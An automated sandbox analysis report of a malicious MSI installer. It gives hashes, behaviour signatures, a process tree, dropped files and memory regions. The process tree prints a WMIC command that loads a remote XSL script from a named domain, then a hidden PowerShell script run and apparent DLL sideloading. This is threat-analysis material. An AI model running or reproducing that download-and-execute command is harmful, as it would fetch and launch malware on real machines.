Analysis

  • max time kernel
    121s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    02-12-2021 11:58

General

  • Target

    test/91B5DB3C0CCBD68BD04C24571E27F99D.msi

  • Size

    277KB

  • MD5

    91b5db3c0ccbd68bd04c24571e27f99d

  • SHA1

    b01cb4fe38315d41fcbe9c6278ebe4574496ab0d

  • SHA256

    ec85138598c57c6a6bdb5ed470614f582d3b5a8c6b243eb2f41b9970ea13d130

  • SHA512

    9f0b07f961625fcc06ee64fcfe5e35e0d40db81f75c3cbc584434c1925fac241db69cac3c1a1bf329d965a4df9bdaa53c13bb8ea3206e2c9d4facf7f74ba21b7

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Executes dropped EXE 3 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 9 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\test\91B5DB3C0CCBD68BD04C24571E27F99D.msi
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1116
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1500
    • C:\Windows\system32\MsiExec.exe
      C:\Windows\system32\MsiExec.exe -Embedding 860EFC005E1CDFC03427BB24323CADA7
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:1928
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1340
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
          4⤵
          • Blocklisted process makes network request
          • Drops startup file
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:732
          • C:\Users\Admin\AppData\Roaming\mgEpoO\nvsmartmaxapp.exe
            "C:\Users\Admin\AppData\Roaming\mgEpoO\nvsmartmaxapp.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1104
            • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
              "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
              6⤵
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              PID:896
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 858E5C33C24697FCC09642D071329959
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1088
      • C:\Users\Admin\AppData\Local\Temp\lc869D.tmp
        "C:\Users\Admin\AppData\Local\Temp\lc869D.tmp"
        3⤵
        • Executes dropped EXE
        PID:1884
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {8EC06547-DA73-4E8C-B489-8E1DDD8A5E65} S-1-5-21-2955169046-2371869340-1800780948-1000:UKNHJUQT\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1560
    • C:\Users\Admin\AppData\Roaming\mgEpoO\gup.exe
      C:\Users\Admin\AppData\Roaming\mgEpoO\gup.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1432
      • C:\Program Files (x86)\Internet Explorer\iexplore.exe
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        3⤵
        • Loads dropped DLL
        PID:1532

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Admin.ps1

    MD5

    9a362dd5fb8679b63ca3996098a903ff

    SHA1

    f86f4bdc36538c666ed60c7ad2091b9e07b6c7e3

    SHA256

    30cc11279f166a46236eb838391df9d0d93fda8e818755a6fbe6168d13c7e8fc

    SHA512

    d805eb926fd611cf81834d2f6fb27f025954365b636bc536c83247611106110dc404cbf96ce79ec96d76db443bcc24681903b786813e6ae407c1df7a59b71452

  • C:\Users\Admin\AppData\Local\Temp\lc869D.tmp

    MD5

    55ffee241709ae96cf64cb0b9a96f0d7

    SHA1

    b191810094dd2ee6b13c0d33458fafcd459681ae

    SHA256

    64bc6cf6b6e9850cea2a36cabc88982b0b936dd7f0bc169a2f6dd2a5d1e86abf

    SHA512

    01d05a5f34be950ec660af9e1de5c7d3c0e473f7815c2e13157c0b7bf162ca5a6b34fabc3704ba6e4fb339a53b1a20862fe984e16feca81f45cf4a0f98e01c07

  • C:\Users\Admin\AppData\Roaming\mgEpoO\NvSmartMax

    MD5

    78ef53b2ad57536c74bbafece93a95e6

    SHA1

    4b23eb993a5853013911a0310c1cbb834500ba94

    SHA256

    371a793bdbe086871f1526000f878499b5fdd0426ffb6934745866483bbb6751

    SHA512

    182079daa43cf65d29d277274cdb78b3383a61a518237c65bf4dcc29ba71e147c425f097d4473fecd455f4f9ab44c316bf1e292d045529b167bb852cb1babe71

  • C:\Users\Admin\AppData\Roaming\mgEpoO\NvSmartMax.dll

    MD5

    5b861438e716d7c47632c4922be36795

    SHA1

    499a5534020bd3ffa82097bf1edae7668367b6bc

    SHA256

    eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

    SHA512

    9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

  • C:\Users\Admin\AppData\Roaming\mgEpoO\gup.exe

    MD5

    45c01734ed56c52797156620a5f8b414

    SHA1

    fc37ac7523cf3b4020ec46d6a47bc26957e3c054

    SHA256

    20ae23a6793e58761a28949dec7e910ce6479ab9c2b7bcbd7a1bb4df1171c503

    SHA512

    4bd34101fff667a19d4884ef7f1b952dc236918138e1571aba8d5a0d691f914260a0233d6906168ed5c70f19e15f7328b1f82eb6247a1fe71395f6d4798ccf75

  • C:\Users\Admin\AppData\Roaming\mgEpoO\gup.exe

    MD5

    45c01734ed56c52797156620a5f8b414

    SHA1

    fc37ac7523cf3b4020ec46d6a47bc26957e3c054

    SHA256

    20ae23a6793e58761a28949dec7e910ce6479ab9c2b7bcbd7a1bb4df1171c503

    SHA512

    4bd34101fff667a19d4884ef7f1b952dc236918138e1571aba8d5a0d691f914260a0233d6906168ed5c70f19e15f7328b1f82eb6247a1fe71395f6d4798ccf75

  • C:\Users\Admin\AppData\Roaming\mgEpoO\gup.xml

    MD5

    b023cc4d768b34a5401f317479740a53

    SHA1

    4ca45db707b120bca9cb6cd8404b9e6ecabdb2d2

    SHA256

    d3e6404c7286961cbab82d4c49f82bcb166db9b5a13eacaa0eeb59a0709a0c14

    SHA512

    82829b0d22cdb857cf1d299a9898d1862b61cd3c22eb05cb638391d3a54b12d5dd7a824ef838a9453e2c2b85c516eacad18b6d19221ad24f0bcedc2fff942e25

  • C:\Users\Admin\AppData\Roaming\mgEpoO\libcurl

    MD5

    b4ad244ff08ca0a4413bead51fd9bb2c

    SHA1

    61f2e2d9237406eecbd446e782549019404ef5cd

    SHA256

    b150bc468e1df07540255450df863f5e309f7142f12edd5ed2d847ef8b05ab04

    SHA512

    f56532d9c780ce61f41f0f3030760d4add99dd2bd34bf22acab15b0c497c68cefd8734576b84ce23f8f93eb80a6162ca683c0ef237512040d2515112cd75b800

  • C:\Users\Admin\AppData\Roaming\mgEpoO\libcurl.dll

    MD5

    e880c09454a68b4714c6f184f7968070

    SHA1

    4dba5fe842b01b641a7228a4c8f805e4627c0012

    SHA256

    c9cf8e159809cfa97971a0b84801c6aead32e03a423a2fd0ca1c402032b16a82

    SHA512

    712d14d1a90c1187724139d8e7c78726e41a677fa7a41a9206a95234d099b0962da757beecd61c6ba84ef9b6aa2260d3d5a40f11f282bd8a0c1cec40029daef5

  • C:\Users\Admin\AppData\Roaming\mgEpoO\nvsmartmaxapp.exe

    MD5

    df3e0e32d1e1fb50cc292aebc5e5b322

    SHA1

    12c93bb262696314123562f8a4b158074c9f6b95

    SHA256

    6a1f91b94bc6c7167967983a78aa1c8780decad66c278e3d7da5e8d4dbec4412

    SHA512

    71008d9cdea4331202ef4d6b68e23ceae8173d27b0c5a2ee01c6effa50a430c656fbf408197d82b08e58d66a77883ac74ad5a2ede1da8e48c8a3b24c8817072d

  • C:\Windows\Installer\MSI6C5A.tmp

    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

  • C:\Windows\Installer\MSI7734.tmp

    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

  • C:\Windows\Installer\MSI8548.tmp

    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

  • C:\Windows\Installer\MSI8E10.tmp

    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

  • \Users\Admin\AppData\Local\Temp\lc869D.tmp

    MD5

    55ffee241709ae96cf64cb0b9a96f0d7

    SHA1

    b191810094dd2ee6b13c0d33458fafcd459681ae

    SHA256

    64bc6cf6b6e9850cea2a36cabc88982b0b936dd7f0bc169a2f6dd2a5d1e86abf

    SHA512

    01d05a5f34be950ec660af9e1de5c7d3c0e473f7815c2e13157c0b7bf162ca5a6b34fabc3704ba6e4fb339a53b1a20862fe984e16feca81f45cf4a0f98e01c07

  • \Users\Admin\AppData\Roaming\mgEpoO\NvSmartMax.dll

    MD5

    5b861438e716d7c47632c4922be36795

    SHA1

    499a5534020bd3ffa82097bf1edae7668367b6bc

    SHA256

    eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

    SHA512

    9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

  • \Users\Admin\AppData\Roaming\mgEpoO\NvSmartMax.dll

    MD5

    5b861438e716d7c47632c4922be36795

    SHA1

    499a5534020bd3ffa82097bf1edae7668367b6bc

    SHA256

    eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

    SHA512

    9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

  • \Users\Admin\AppData\Roaming\mgEpoO\libcurl.dll

    MD5

    e880c09454a68b4714c6f184f7968070

    SHA1

    4dba5fe842b01b641a7228a4c8f805e4627c0012

    SHA256

    c9cf8e159809cfa97971a0b84801c6aead32e03a423a2fd0ca1c402032b16a82

    SHA512

    712d14d1a90c1187724139d8e7c78726e41a677fa7a41a9206a95234d099b0962da757beecd61c6ba84ef9b6aa2260d3d5a40f11f282bd8a0c1cec40029daef5

  • \Users\Admin\AppData\Roaming\mgEpoO\libcurl.dll

    MD5

    e880c09454a68b4714c6f184f7968070

    SHA1

    4dba5fe842b01b641a7228a4c8f805e4627c0012

    SHA256

    c9cf8e159809cfa97971a0b84801c6aead32e03a423a2fd0ca1c402032b16a82

    SHA512

    712d14d1a90c1187724139d8e7c78726e41a677fa7a41a9206a95234d099b0962da757beecd61c6ba84ef9b6aa2260d3d5a40f11f282bd8a0c1cec40029daef5

  • \Windows\Installer\MSI6C5A.tmp

    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

  • \Windows\Installer\MSI7734.tmp

    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

  • \Windows\Installer\MSI8548.tmp

    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

  • \Windows\Installer\MSI8E10.tmp

    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

  • memory/732-71-0x0000000002422000-0x0000000002424000-memory.dmp

    Filesize

    8KB

  • memory/732-72-0x0000000002424000-0x0000000002427000-memory.dmp

    Filesize

    12KB

  • memory/732-83-0x000000001C690000-0x000000001C6A9000-memory.dmp

    Filesize

    100KB

  • memory/732-67-0x0000000000000000-mapping.dmp

  • memory/732-70-0x0000000002420000-0x0000000002422000-memory.dmp

    Filesize

    8KB

  • memory/732-73-0x000000001B740000-0x000000001BA3F000-memory.dmp

    Filesize

    3.0MB

  • memory/732-69-0x000007FEF2B90000-0x000007FEF36ED000-memory.dmp

    Filesize

    11.4MB

  • memory/732-80-0x000000000242B000-0x000000000244A000-memory.dmp

    Filesize

    124KB

  • memory/896-90-0x00000000000C0000-0x00000000000C1000-memory.dmp

    Filesize

    4KB

  • memory/896-91-0x0000000000000000-mapping.dmp

  • memory/896-93-0x0000000001EC0000-0x000000000223D000-memory.dmp

    Filesize

    3.5MB

  • memory/896-97-0x00000000001D0000-0x00000000001D1000-memory.dmp

    Filesize

    4KB

  • memory/1088-62-0x0000000076231000-0x0000000076233000-memory.dmp

    Filesize

    8KB

  • memory/1088-61-0x0000000000000000-mapping.dmp

  • memory/1104-88-0x0000000000800000-0x0000000000B7D000-memory.dmp

    Filesize

    3.5MB

  • memory/1104-96-0x0000000000120000-0x0000000000121000-memory.dmp

    Filesize

    4KB

  • memory/1104-84-0x0000000000000000-mapping.dmp

  • memory/1116-55-0x000007FEFBB91000-0x000007FEFBB93000-memory.dmp

    Filesize

    8KB

  • memory/1340-60-0x0000000000000000-mapping.dmp

  • memory/1432-99-0x0000000000000000-mapping.dmp

  • memory/1432-103-0x0000000000330000-0x0000000000453000-memory.dmp

    Filesize

    1.1MB

  • memory/1532-105-0x0000000000000000-mapping.dmp

  • memory/1884-77-0x0000000000000000-mapping.dmp

  • memory/1928-59-0x00000000002D0000-0x00000000002E0000-memory.dmp

    Filesize

    64KB

  • memory/1928-57-0x0000000000000000-mapping.dmp